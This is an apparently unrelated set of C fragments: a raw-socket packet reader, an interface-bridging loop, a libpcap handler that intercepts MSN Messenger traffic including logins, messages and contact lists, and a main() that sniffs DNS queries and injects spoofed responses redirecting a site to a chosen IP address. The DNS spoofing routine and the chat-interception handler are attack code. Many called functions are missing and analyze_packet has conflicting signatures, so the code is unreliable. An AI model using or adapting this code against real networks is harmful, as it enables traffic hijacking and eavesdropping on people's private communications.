int main() { int sockfd; int size; u_char buf[65535]; if((sockfd=init_raw_socket("eth1")) == -1) return(-1); /* get_ether_info() { }*/ while (1) { if((size=read(sockfd, buf, sizeof(buf))) <= 0) perror("read()"); analyze_packet(buf, size); } close(sockfd); return(0); }
int router() { struct pollfd targets[DEVICE_NUM]; int i; int status,size; u_char buf[2048]; targets[0].fd = device[0].soc; targets[0].events = POLLIN | POLLERR; targets[1].fd = device[1].soc; targets[1].events = POLLIN | POLLERR; while(1) { switch(status = poll(targets, DEVICE_NUM, 100)) { case -1: if (errno != EINTR) { perror("poll"); } break; case 0: break; default: for(i = 0; i < DEVICE_NUM; i++) { if (targets[i].revents & (POLLIN|POLLERR)) { if ((size = read(device[i].soc, buf, sizeof(buf))) <= 0) { perror("cannnot read device"); } else { if (analyze_packet(i, buf, size) != -1) { if ((size = write(device[get_opposite_dev(i)].soc, buf, size)) <= 0) { perror("cannnot write device"); } } } } } break; } } }
void process_packet (long packet_id, struct pcap_pkthdr *header, const u_char *packet) { struct tm *ltime; char timestr[16]; /* Make sure we have enough data to read the IP header*/ if ( header->caplen < (data_offset + sizeof (struct ip_header))) return; /* Get IP header, which comes after the datalink header (14 bytes for ethernet) */ struct ip_header *ih = (ip_header *) (packet + data_offset); /* TCP header comes right after */ int ip_len = (ih->ver_ihl & 0xf) * 4; struct tcp_header *th = (tcp_header *) ((u_char*)ih + ip_len); if ( ( (u_char *) th+sizeof (struct tcp_header)) > (packet + header->caplen) ) { /* the TCP header ends beyond the received data */ return; } int source_port = ntohs (th->th_sport); int destination_port = ntohs (th->th_dport); if (source_port!=1863 && destination_port!=1863) return; u_short th_len = (th->off_unused& 0xF0) >> 4; // Convert time ltime=localtime(&header->ts.tv_sec); strftime( timestr, sizeof timestr, "%H:%M:%S", ltime); u_char *data_onpacket = (u_char *) th +th_len*4; int data_onpacket_size = header->caplen - th_len*4 - ip_len - data_offset; int comesfromA = 0; int data_size; u_char *payload; int allzeros = 1; for (int i=0; i<data_onpacket_size; i++) { if (data_onpacket[i]!=0) { allzeros=0; break; } } if (allzeros) { log_debug (5, "Ignoring empty or all-zero packet"); return; } // Is this packet part of a connection known to be MSN for sure? struct msn_connection *ci = get_or_create_msn_connection (&ih->saddr, source_port, &ih->daddr, destination_port, create_no); log_debug (3, "Processing packet with ID: %ld", packet_id); if (ci==NULL) { // No. log_debug (3, "Packet is not from a known conversation"); payload=(u_char *) malloc (data_onpacket_size); memcpy (payload, data_onpacket, data_onpacket_size); data_size=data_onpacket_size; } else { if (is_from_A(ci, &ih->saddr, source_port)==1) { log_debug (3, "Packet is from a known conversation (A), pending =%d", ci->pending_A_length); payload=(u_char *) malloc (data_onpacket_size + ci->pending_A_length); if (ci->pending_A_length>0) memcpy (payload, ci->pending_A, ci->pending_A_length); memcpy (payload + ci->pending_A_length, data_onpacket, data_onpacket_size); data_size=data_onpacket_size + ci->pending_A_length; ci->pending_A_length=0; if (ci->pending_A!=NULL) { free (ci->pending_A); } ci->pending_A=NULL; comesfromA=1; } else { log_debug (3, "Packet is from a known conversation (B), pending =%d", ci->pending_B_length); payload=(u_char *) malloc (data_onpacket_size + ci->pending_B_length); if (ci->pending_B_length>0) memcpy (payload, ci->pending_B, ci->pending_B_length); memcpy (payload + ci->pending_B_length, data_onpacket, data_onpacket_size); data_size=data_onpacket_size + ci->pending_B_length; ci->pending_B_length=0; if (ci->pending_B!=NULL) { free (ci->pending_B); } ci->pending_B=NULL; comesfromA=0; } } log_debug (3, "Real size = %d, current size=%d",data_onpacket_size, data_size); int pos = 0; u_char *ref = payload; while (data_size) { log_debug (5, "In while (data_size)"); int packet_type; if (data_size<3) packet_type= PT_UNKNOWN; else packet_type = analyze_packet (payload); log_debug (5, "data_size = %d, packet type =%d", data_size, packet_type); char fromto[1024]; sprintf(fromto, "%d.%d.%d.%d:%d -> %d.%d.%d.%d:%d", ih->saddr.byte1, ih->saddr.byte2, ih->saddr.byte3, ih->saddr.byte4, source_port, ih->daddr.byte1, ih->daddr.byte2, ih->daddr.byte3, ih->daddr.byte4, destination_port); log_debug (3, "%s",fromto); log_debug (5, "%s.%.6d longitud:%d (cap: %d)", timestr, header->ts.tv_usec, header->len, header->caplen); u_char prefix[1024]; sprintf ((char *) prefix, "%s | %s | ",timestr, fromto); // int processed; int bytes_parsed=-1; // Number of bytes the handler managed // Vamos a ver si es un MSG y si tiene buena // pinta despues char line_x[30]=""; switch (packet_type) { case PT_UNKNOWN: if (ci==NULL) { log_debug (3, "Unknown data from an unknown conversation, skipping."); bytes_parsed = data_size; // No sabemos lo que es, mejor anular todo el paquete break; } else { log_debug (3, "Unknown data but from a known MSN conversation, attempting to skip and resume"); } line_x[0]=0; for (int j=0; j<data_size; j++) { sprintf (line_x+strlen (line_x), "%02X ", payload[j]); if (j%8==0) { log_debug (5, "%s",line_x); line_x[0] = 0; } } if (strlen (line_x)>0) log_debug (5,"%s",line_x); line_x[0]=0; for (int j=0; j<data_size; j++) { sprintf (line_x+strlen (line_x), "%c", payload[j]); if (j%8==0) { log_debug (5, "%s",line_x); line_x[0]=0; } } if (strlen (line_x)>0) log_debug (5,"%s",line_x); bytes_parsed = get_new_line_malloc (NULL,payload,data_size); break; case PT_MSN_SYN: // List sync. bytes_parsed = handler_msn_syn (payload, data_size, ih->saddr, source_port, ih->daddr, destination_port); break; case PT_MSN_MSG: bytes_parsed = handler_msn_msg (payload, data_size, ih->saddr, source_port, ih->daddr, destination_port); break; case PT_MSN_USR: // User identification and authentification bytes_parsed = handler_msn_usr (payload, data_size, ih->saddr, source_port, ih->daddr, destination_port); break; case PT_MSN_ANS: /* Entry in a switchboard after being invited */ bytes_parsed = handler_msn_ans (payload, data_size, ih->saddr, source_port, ih->daddr, destination_port); break; case PT_MSN_IRO: /* Initial user list in a switchboard */ bytes_parsed = handler_msn_iro (payload, data_size, ih->saddr, source_port, ih->daddr, destination_port); break; case PT_MSN_JOI: // Usuario entrando en el switchboard bytes_parsed = handler_msn_joi (payload, data_size, ih->saddr, source_port, ih->daddr, destination_port); break; case PT_MSN_OUT: // Session termination bytes_parsed = handler_msn_out (payload, data_size, ih->saddr, source_port, ih->daddr, destination_port); break; case PT_MSN_IGNORE: // Ignore these packets bytes_parsed = handler_msn_ignore (payload, data_size, ih->saddr, source_port, ih->daddr, destination_port); break; case PT_MSN_BYE: // User leaving switchboard bytes_parsed = handler_msn_bye (payload, data_size, ih->saddr, source_port, ih->daddr, destination_port); break; case PT_MSN_CHG: // User changing status bytes_parsed = handler_msn_chg (payload, data_size, ih->saddr, source_port, ih->daddr, destination_port); break; case PT_MSN_ILN: // Initial user status bytes_parsed = handler_msn_iln (payload, data_size, ih->saddr, source_port, ih->daddr, destination_port); break; case PT_MSN_NLN: // User changing status bytes_parsed = handler_msn_nln (payload, data_size, ih->saddr, source_port, ih->daddr, destination_port); break; case PT_MSN_LST: // Contact list bytes_parsed = handler_msn_lst (payload, data_size, ih->saddr, source_port, ih->daddr, destination_port); break; case PT_MSN_PRP: // Contact list bytes_parsed = handler_msn_prp (payload, data_size, ih->saddr, source_port, ih->daddr, destination_port); break; case PT_MSN_FLN: // Contact list bytes_parsed = handler_msn_fln (payload, data_size, ih->saddr, source_port, ih->daddr, destination_port); break; default: log_debug (0, "this is a bug! (packet_Type=%d)", packet_type); bytes_parsed = data_size; /* Don't know what it is, skip the whole thing */ break; } switch (bytes_parsed) { case NOT_MSN: bytes_parsed = data_size; /* Don't know what it is, skip the whole thing */ data_size = 0; log_debug (3, "Skipping rest of packet"); break; case LINE_INCOMPLETE: log_debug (3, "Processed = LINE_INCOMPLETE, no complete line available"); if (ci!=NULL) /* It's from a known conversation, store the rest of stuff for later */ { if (comesfromA) { log_debug (3, "It's from a known conversation (A > B), added to pending data"); if (ci->pending_A!=NULL) log_debug (0, "pending_A has data!"); ci->pending_A=(u_char *) malloc (data_size); memcpy (ci->pending_A,payload,data_size); ci->pending_A_length=data_size; } else { log_debug (3, "It's from a known conversation (B > A), added to pending data"); if (ci->pending_B!=NULL) log_debug (0, "pending_B has data!"); ci->pending_B=(u_char *) malloc (data_size); memcpy (ci->pending_B,payload,data_size); ci->pending_B_length=data_size; } if (ci->pending_A_length>8192 || ci->pending_B_length>8192) { /* No payload is this long - skip everything */ log_debug (3, "Payload too long, skipping everything"); remove_msn_connection(ci); } } bytes_parsed = data_size; /* Get out */ data_size = 0; break; case CONN_DESTROYED: bytes_parsed = data_size; /* Pointless to go on... */ data_size = 0; break; case OUT_OF_MEMORY: log_debug (0, "Out of memory somewhere, likely to crash soon"); bytes_parsed = data_size; /* Get out */ data_size = 0; break; default: data_size -=bytes_parsed; payload += bytes_parsed; } } log_debug (5, "Freeing stuff"); /* if (dump!=NULL) free (dump); */ if (ref!=NULL) free (ref); log_debug (5, "Leaving process_packet"); }
int main(int argc, char **argv) { char *spoof_addr; char *site_name; char temp_site[128]; char *device; char filter[1024]; /* Capture filter */ char errbuf[PCAP_ERRBUF_SIZE]; /* Error buffer */ pcap_t* capdev; /* Capturing Device */ const u_char *packet = NULL; struct pcap_pkthdr pcap_hdr; /* Pcap packet header */ libnet_t *handler; /* Libnet handler */ int var; /* reserve the space for the spoofed packet */ memset(&spoofpacket, '\0', sizeof(struct sp)); /* get the spoofing IP address from input */ spoof_addr = "222.106.38.120"; site_name = "example.com"; if (argc >= 2) spoof_addr = argv[1]; if (argc >= 3) site_name = argv[2]; if (strncmp(site_name, "www", 3) != 0) { strncpy(temp_site, "www.", 4); strcpy(temp_site+4, site_name); site_name = temp_site; } /* get a device to sniff on */ device = pcap_lookupdev(errbuf); if (device == NULL) { printf("%s\n", errbuf); exit(1); } strcpy(filter, "udp dst port 53"); /* Setup for sniffering */ capdev = set_cap_dev(device, filter); printf("Sniffering on: %s\n", device); printf("Spoofing address: %s\n", spoof_addr); for (;;) { packet = pcap_next(capdev, &pcap_hdr); /* Grab a packet */ /**** USE: pcap function to grab next packet****/ if (packet == NULL) { continue; } // printf("Packet Length%d\n", pcap_hdr.len); //printf("Return value: %d", var); /* If the packet is a DNS query, create a packet */ if ((analyze_packet(packet, (int)pcap_hdr.caplen, spoof_addr, site_name)) == 1) { // printf("DNS packet found\n"); // Inject the spoofed DNS response // printf("Device: %s", device); spoof_dns(device); // printf("YAY! DNS packet sent\n"); // return 1; } } return 0; }